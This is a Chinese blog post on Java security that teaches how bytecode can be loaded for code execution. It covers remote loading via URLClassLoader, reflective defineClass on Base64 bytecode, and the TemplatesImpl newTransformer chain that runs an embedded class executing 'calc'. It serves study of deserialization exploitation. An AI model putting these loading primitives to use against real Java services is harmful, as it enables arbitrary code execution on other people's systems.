ClassLoader与字节码

最新推荐文章于 2023-12-29 12:00:00 发布
最新推荐文章于 2023-12-29 12:00:00 发布
阅读量553 收藏 2
点赞数
分类专栏: Java安全 文章标签: java 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53287512/article/details/127164219
版权

ClassLoader与字节码

ClassLoader为类加载器,它是用来加载 Class 的。它负责将 Class 的字节码形式转换成内存形式的 Class 对象。字节码可以来自于磁盘文件 *.class,也可以是 jar 包里的 *.class,也可以来自远程服务器提供的字节流,字节码的本质就是一个字节数组 []byte,它有特定的复杂的内部格式。

img

有很多字节码加密技术就是依靠定制 ClassLoader 来实现的。先使用工具对字节码文件进行加密,运行时使用定制的 ClassLoader 先解密文件内容再加载这些解密后的字节码。

每个 Class 对象的内部都有一个 classLoader 字段来标识自己是由哪个 ClassLoader 加载的。ClassLoader 就像一个容器,里面装了很多已经加载的 Class 对象。

class Class<T> {
  ...
  private final ClassLoader classLoader;
  ...
}

本文中所说的“字节码”,可以理解的更广义一些——所有能够恢复成一个类并在JVM虚拟机里加载的字节序列,都在我们的探讨范围内

利用URLClassLoader 加载远程class文件

URLClassLoader 实际上是我们平时默认使用的 AppClassLoader 的父类,所以,我们解释
URLClassLoader 的工作过程实际上就是在解释默认的Java类加载器的工作流程。
正常情况下,Java会根据配置项 sun.boot.class.path 和 java.class.path 中列举到的基础路径(这
些路径是经过处理后的 java.net.URL 类)来寻找.class文件来加载,而这个基础路径有分为三种情况:

  • URL未以斜杠 / 结尾,则认为是一个JAR文件,使用 JarLoader 来寻找类,即为在Jar包中寻找.class文件

  • URL以斜杠 / 结尾,且协议名是 file ,则使用 FileLoader 来寻找类,即为在本地文件系统中寻找.class文件

  • URL以斜杠 / 结尾,且协议名不是 file ,则使用最基础的 Loader 来寻找类

    前两种常用于开发环境中,而第三种出现于非 file 协议的情况下,最常见的就是 http 协议

接下来尝试一下使用HTTP协议远程加载.class文件:

package Loder;

import java.net.URL;
import java.net.URLClassLoader;

public class HelloClassLoder {
    public static void main(String[] args) throws Exception {
        URL[] urls={new URL("http://localhost:8000/")};
        URLClassLoader loder = URLClassLoader.newInstance(urls);
        Class hello = loder.loadClass("Hello");
        hello.newInstance();
    }
}

然后编译生成一个简单程序Hello.class,放到http://localhost:8000/Hello.class

package Loder;

public class Hello{
    public Hello(){
        System.out.println("Hello World!!");
    }
}

运行HelloClassLoder.java,即可成功请求到我们的 /Hello.class 文件,并执行了文件里的字节码,输出了"Hello World"。
所以,作为攻击者,如果我们能够控制目标Java ClassLoader的基础路径为一个http服务器,则可以利用远程加载的方式执行任意代码了

利用ClassLoader#defineClass 直接加载字节码

前面说了使用URLClassLoader加载class,但不管是如何加载字节码,java都会经过以下三个阶段:

ClassLoader#loadClass ->ClassLoader#findClass ->ClassLoader#defineClass

  • loadClass的作用是从已加载的类缓存、父加载器等位置寻找类(这里实际上是双亲委派机制),在前面没有找到的情况下,执行findClass

  • findClass的作用是根据基础URL指定的方式来加载类的字节码,就像上一节中说到的,可能会在本地文件系统、jar包或远程http服务器上读取字节码,然后交给defineClass

  • defineClass的作用是处理前面传入的字节码,将其处理成真正的Java类

所以其实真正加载类的方法是defineClass,也就是说,如果我们可以调用defineClass方法,就可以实现任意代码执行,接下来我们简单看一下defineClass的实现

package Loder;
import java.lang.reflect.Method;
import java.util.Base64;

public class DefineClass {
    public static void main(String[] args) throws Exception {
        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        defineClass.setAccessible(true);
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAGwoABgANCQAOAA8IABAKABEAEgcAEwcAFAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApTb3VyY2VGaWxlAQAKSGVsbG8uamF2YQwABwAIBwAVDAAWABcBAAtIZWxsbyBXb3JsZAcAGAwAGQAaAQAFSGVsbG8BABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAABAAEABwAIAAEACQAAAC0AAgABAAAADSq3AAGyAAISA7YABLEAAAABAAoAAAAOAAMAAAACAAQABAAMAAUAAQALAAAAAgAM");
        Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length);
        hello.newInstance();
    }
}

当类初始化的时候,类的static块中的代码会执行,但是defineClass被调用时,类对象是没有被初始化的,只有这个对象显式地调用其构造函数,初始化代码才能被执行,我们用反射调用其构造函数,成功执行放在static中的代码

image-20221004154313186

利用TemplatesImpl 加载字节码

从defineClass的知识中得知,如果我们能够调用defineClass方法,将可以加载自定义字节码,从而执行任意命令,而TemplatesImpl中使用了defineClass方法。

static final class TransletClassLoader extends ClassLoader {
        private final Map<String,Class> _loadedExternalExtensionFunctions;

         TransletClassLoader(ClassLoader parent) {
             super(parent);
            _loadedExternalExtensionFunctions = null;
        }

        TransletClassLoader(ClassLoader parent,Map<String, Class> mapEF) {
            super(parent);
            _loadedExternalExtensionFunctions = mapEF;
        }

        public Class<?> loadClass(String name) throws ClassNotFoundException {
            Class<?> ret = null;
            // The _loadedExternalExtensionFunctions will be empty when the
            // SecurityManager is not set and the FSP is turned off
            if (_loadedExternalExtensionFunctions != null) {
                ret = _loadedExternalExtensionFunctions.get(name);
            }
            if (ret == null) {
                ret = super.loadClass(name);
            }
            return ret;
         }

        /**
         * Access to final protected superclass member from outer class.
         */
        Class defineClass(final byte[] b) {
            return defineClass(null, b, 0, b.length);
        }
    }

我们可以看到这个类从写了defineClass方法,但其作用域为default,可以被类外部调用。

我们来找一下 TransletClassLoader#defineClass()的利用链:

首先defineTransletClasses中调用了defineClass方法,但defineTransletClasses为privat类型,我们不能直接调用,继续向上找

image-20221004160020760

接着是getTransletInstance(),但他同样是private类型,继续向上

image-20221004160326462

最后我们找到了 newTransformer()方法,其为public类型,可以被外部调用

image-20221004160448091

所以我们完整的调用链为

TemplatesImpl#newTransformer() ->
TemplatesImpl#getTransletInstance() ->
TemplatesImpl#defineTransletClasses() ->
TransletClassLoader#defineClass()

我们尝试简单构造一下

package CCdemo;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import java.lang.reflect.Field;
import java.util.Base64;

public class Test {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAMQoADQAaCAAbCgAFABwIAB0HAB4KAAUAHwgAIAcAIQcAIgoAIwAkCAAlBwAmBwAn" +
                "AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHACgB" +
                "AAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9E" +
                "T007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXph" +
                "dGlvbkhhbmRsZXI7KVYHACkBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94" +
                "c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVy" +
                "YXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6" +
                "YXRpb25IYW5kbGVyOylWAQAKU291cmNlRmlsZQEACkhlbGxvLmphdmEMAA4ADwEAEWphdmEubGFu" +
                "Zy5SdW50aW1lDAAqACsBAApnZXRSdW50aW1lAQAPamF2YS9sYW5nL0NsYXNzDAAsAC0BAARleGVj" +
                "AQAQamF2YS9sYW5nL1N0cmluZwEAEGphdmEvbGFuZy9PYmplY3QHAC4MAC8AMAEABGNhbGMBAAtM" +
                "b2Rlci9IZWxsbwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50" +
                "aW1lL0Fic3RyYWN0VHJhbnNsZXQBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcv" +
                "YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAHZm9yTmFtZQEA" +
                "JShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBAEAoTGph" +
                "dmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRo" +
                "b2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2Jq" +
                "ZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7ACEADAANAAAAAAADAAEA" +
                "DgAPAAIAEAAAAHEABgAFAAAAQSq3AAESArgAA0wrEgQDvQAFtgAGTSsSBwS9AAVZAxIIU7YABk4s" +
                "KwO9AAm2AAo6BC0ZBAS9AAlZAxILU7YAClexAAAAAQARAAAAHgAHAAAADQAEAA4ACgAPABUAEAAl" +
                "ABEAMAASAEAAFQASAAAABAABABMAAQAUABUAAgAQAAAAGQAAAAMAAAABsQAAAAEAEQAAAAYAAQAA" +
                "ABcAEgAAAAQAAQAWAAEAFAAXAAIAEAAAABkAAAAEAAAAAbEAAAABABEAAAAGAAEAAAAZABIAAAAE" +
                "AAEAFgABABgAAAACABk=");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "exec");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        obj.newTransformer();
    }
}

其中,setFieldValue为设置属性,_bytecodes为字节码组成的数组,_name 可以是任意字符串,只要不为null即可;_tfactory 需要是一个 TransformerFactoryImpl 对象,因为TemplatesImpl#defineTransletClasses() 方法里有调用_tfactory.getExternalExtensionsMap() ,如果是null会出错

需要注意的是,加载的字节码中,这个字节码对应的类必须是 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet的子类

package Loder;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.lang.reflect.Method;

public class Exec extends AbstractTranslet {
    public Exec() throws Exception {
        super();
        Class runtime = Class.forName("java.lang.Runtime");
        Method getRuntime = runtime.getMethod("getRuntime");
        Method exec = runtime.getMethod("exec", String.class);
        Object invoke = getRuntime.invoke(runtime);
        exec.invoke(invoke,"calc");
//这里直接使用Runtime.getRuntime().exec("calc")就行
    }
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}

参考:

java安全漫谈-phith0n

https://zhuanlan.zhihu.com/p/51374915

Christ1na
关注
专栏目录
深入学习JVM探针与字节码技术
大仙
10-07 1328
JVM探针是自jdk1.5以来,由虚拟机提供的一套监控类加载器和符合虚拟机规范的代理接口,结合字节码指令能够让开发者实现无侵入的监控功能。如:监控生产环境中的函数调用情况或动态增加日志输出等等。虽然在常规的业务中不会有太多用武之地,但是作为一项高级的技术手段也应该是资深开发人员的必备技能之一。同时,它也是企业级开发和生产环境部署不可或缺的技术方案,是对当下流行的APM的一种补充,因为使用探针技术能够实现比常规APM平台更细粒度的监控。 哪些方面适合使用探针技术: (1) 如果你发现生产环境上有些问题无法
破解java加密ClassLoader.java,在classloader植入破解代码
10-15
破解java加密ClassLoader.java,在classloader植入破解代码
使用classloader动态加载Class
05-30
NULL 博文链接:https://ldbjakyo.iteye.com/blog/1046984
java字节码以及ClassLoader类加载机制
Thunderclap的博客
02-09 662
上面提到ClassLoader 能够加载字节码的关键就在于loadClass findClass defineClass 这三个方法因为 loadClass 实现了双亲委派机制, Java 官方不推荐直接重写该方法 (除去一些特殊情况, 比如 tomcat 和 jdbc 就破坏了这种机制)而defineClass 是一个 native 方法, 底层由 C++ 实现所以我们的重点就是重写 findClass 方法, 并最终在里面调用 defineClass。
Class, Classloader字节码
weixin_33701251的博客
05-02 227
为什么80%的码农都做不了架构师?>>> ...
利用defineClass加载字节码
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
12-29 487
【代码】利用defineClass加载字节码
java源程序加密解决方案(基于Classloader解密)
cjnetwork
12-24 772
源程序加密解决方案 1. 概述: Java源程序的加密,有如下两种: 1使用混淆器对源码进行混淆,降低反编译工具的作用 2基于classloader的自定义加密、解密运行 1.1. 混淆器加密 1.2. 自定义classloader加密 1.2.1. 原理 原理:java虚拟机的动态加载机制,为classloader加密方案提供了理论基础。在jvm装载运行程序,初始的时...
深入理解JVM:ClassLoader字节码执行
例如,FieldInfo的属性可能包含变量的初始值,而MethodInfo的属性则包含字节码,这是实际执行的指令序列。 字节码执行的关键在于Code属性,它包含以下几个要点: 1. 在执行过程中,JVM可以动态计算栈的深度,确保...
深入了解JVM字节码增强技术
08-25
* 使修改后的字节码生效:有两种方法:自定义ClassLoader来加载修改后的字节码;或者在运行时,使用Instrumentation.redefineClasses方法来替换掉原来的字节码。 3. 两种实现机制: * 通过创建原始类的一个子类...
Java Classloading Mechanism : ClassLoader & ASM & 动态字节码增强
03-22
在本篇中,我们将详细探讨ClassLoader的工作原理、ASM库的使用以及如何利用这些工具进行动态字节码增强。 首先,我们来看Java的类加载机制。Java中的类加载主要由ClassLoader完成,它遵循“双亲委派模型”(Parents...
jvm字节码自动加载
02-07
Java虚拟机(JVM)中,字节码自动加载是一项关键功能,它使得Java程序能够在运行时动态地发现和加载类。字节码是由Java源代码编译而成的二进制格式,它包含了类和接口的信息。了解JVM如何自动加载字节码对于深入...
jcrypt:加密的内存Classloader loader + Builder
05-02
地穴 包括用于构建文件的向导(检查发行版,jCrypt.jar)。 Bin.jar必须位于jCrypt.jar的工作目录中 对输入档案进行加密,并将其写入Bin.jar的副本中,并在Extra字段中设置加密密钥,初始化向量,加密资源和mainclass。 运行后,它将在Extra字段中加载信息,解密并加载包含加密的JAR的条目,然后调用它。 格式 Encrypt(K,I):使用对称密钥加密 P:目标JAR K:对称密钥 I:IV代表K C:资源加密布尔 将P作为Encrypt(K,I)存储在jar.dat中 商店K || 我|| C作为P中的额外标头
Class字节码的加载
妖君你好的博客
01-04 193
来自《java特种兵》书籍 提到class的加载,不得不提到ClassLoader因为java加载类就是靠它加载的,它负责读取字节码的字节流进行加载。 ClassLoader的继承关系是从BootstrapClassLoader开始的,也是由它最先加载类,然后是ExtClassLoader,接下来是AppClassLoader(应用程序默认的),最后是用户自己的ClassLoa
Java 类加载器及加载Class字节码
weixin_30882895的博客
04-24 374
参考来源:http://www.cnblogs.com/fingerboy/p/5456371.html java笔记--理解java类加载器以及ClassLoader类 参考来源:http://blog.csdn.net/shareus/article/details/52422788 Java 类加载器及加载Class字节码 转载于:https://www.cnblogs....
深入理解Java虚拟机——第7章 虚拟机类加载机制
zaker123的博客
06-09 269
第7章 虚拟机类加载机制第7章 虚拟机类加载机制7.1 概述7.2 类加载的时机7.3 类加载的过程7.3.1 加载7.3.2 验证7.3.3 准备7.3.4 解析7.3.5 初始化7.4 类加载器7.4.1 类与类加载器7.4.2 双亲委派模型7.4.3 破坏双亲委派模型7.5 Java 模块化系统7.5.1 模块的兼容性7.5.2 模块化下的类加载器 第7章 虚拟机类加载机制 7.1 概述 7.2 类加载的时机 7.3 类加载的过程 7.3.1 加载 7.3.2 验证 7.3.3 准备 7.3.4 解析
类加载ClassLoader
java学习总结
08-28 248
1、ClassLoader读取字节码的字节流进行加载, 类加载的顺序:bootstrapClassLoader —–》extClassLoader –》appClassLoader bootstrapClassLoaderjava自带核心类,java.lang.* extClassLoader :jre/lib/ext下的jar包 appClas...
java如何手撕加载字节码的代码?编写一个加载class文件的方法
纯洁的明依
04-15 373
1 自定义ClassLoader类:MemoryClassLoader public class MemoryClassLoader extends URLClassLoader { // class name to class bytes: Map<String, byte[]> classBytes = new HashMap<String, byte[]>...
java class 加密_Java加密解密class文件,使用classLoader动态解密class文件
weixin_36294922的博客
02-12 462
1 /**2 * 加解密类3 */4 public classEdCipher {56 private String encryptFolder = "encrypt";78 /**9 * 加密方法10 *@paramname 需要加密的文件名11 */12 public voidencryptClass(String name) {13 Str...
利用自定义的 ClassLoader 加密 Java Class 文件
热门推荐
刘勇的专栏
05-31 1万+
本文演示利用自定义的 ClassLoader 加密 Java Class 文件 首先,我们定义一个需要被加密Java Class: classload.MyClassBase。 为了让客户端使用,需要定义一个 MyClassInterface, 这样客户端就不会直接引用 MyClassBase了,发布到客户端的class文件中是不存在 MyClassBase这个类的。 MyC
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值